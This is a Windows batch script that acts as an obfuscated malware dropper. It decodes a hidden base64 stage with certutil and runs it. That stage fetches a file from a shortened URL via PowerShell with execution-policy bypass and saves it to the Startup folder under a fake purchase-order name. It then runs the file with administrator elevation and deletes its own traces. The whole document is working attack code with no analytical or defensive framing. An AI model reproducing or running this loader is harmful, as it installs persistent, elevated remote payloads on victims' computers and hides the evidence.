@echo off
set _t=%TEMP%\SSpMaIlJrHb.b64
set _b=%TEMP%\yHkWdVmC.bat
(
  echo QGVjaG8gb2ZmDQppZiBub3QgREVGSU5FRCBJU19NSU5JTUlaRUQgc2V0IElTX01J
  echo TklNSVpFRD0xICYmIHN0YXJ0ICIiIC9taW4gIiV+ZjAiICUqICYmIGV4aXQNCnNl
  echo dGxvY2FsIGVuYWJsZWRlbGF5ZWRleHBhbnNpb24NCnNldCBTQVZFX1BBVEg9JUFQ
  echo UERBVEElXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3Rh
  echo cnR1cA0Kc2V0IEZJTEVfTkFNRT1PRkZJQ0lBTCBQVVJDSEFTRSBPUkRFUiBJVEVN
  echo U18zLTMxLTIwMjYuYmF0DQpzZXQgRlVMTF9QQVRIPSVTQVZFX1BBVEglXCVGSUxF
  echo X05BTUUlDQpzZXQgRE9XTkxPQURFRD0wDQoNCjo6IE11bHRpLVVSTCBkb3dubG9h
  echo ZCB3aXRoIGZhbGxiYWNrDQoNCmlmICFET1dOTE9BREVEISA9PSAxIGdvdG8gOnJ1
  echo bl9zZWN0aW9uDQplY2hvIFsxLzFdIFRyeWluZzogaHR0cHM6Ly90aW55dXJsLmNv
  echo bS85M2s1NDV6NQ0KcG93ZXJzaGVsbCAtTm9Qcm9maWxlIC1FeGVjdXRpb25Qb2xp
  echo Y3kgQnlwYXNzIC1Db21tYW5kICJJbnZva2UtV2ViUmVxdWVzdCAtVXJpICdodHRw
  echo czovL3Rpbnl1cmwuY29tLzkzazU0NXo1JyAtT3V0RmlsZSAnJUZVTExfUEFUSCUn
  echo Ig0KaWYgZXhpc3QgIiVGVUxMX1BBVEglIiBzZXQgRE9XTkxPQURFRD0xDQoNCjpy
  echo dW5fc2VjdGlvbg0KaWYgIURPV05MT0FERUQhID09IDAgKA0KICAgIGVjaG8gWyFd
  echo IEFsbCBVUkxzIGZhaWxlZC4NCiAgICBwYXVzZQ0KICAgIGV4aXQgL2IgMQ0KKQ0K
  echo ZWNobyBbK10gRG93bmxvYWRlZDogJUZVTExfUEFUSCUNCg0KZWNobyBbKl0gTGF1
  echo bmNoaW5nIHdpdGggQWRtaW4uLi4NCnBvd2Vyc2hlbGwgLUNvbW1hbmQgIlN0YXJ0
  echo LVByb2Nlc3MgJyVGVUxMX1BBVEglJyAtVmVyYiBSdW5BcyINCg0KZWNobyBbT0td
  echo IERvbmUuDQplbmRsb2NhbA0KKGdvdG8pIDI+bnVsICYgZGVsICIlfmYwIg0KZXhp
  echo dCAvYiAwDQo=
) > "%_t%"
certutil -decode "%_t%" "%_b%" >nul 2>&1
del "%_t%" >nul 2>&1
call "%_b%"
del "%_b%" >nul 2>&1
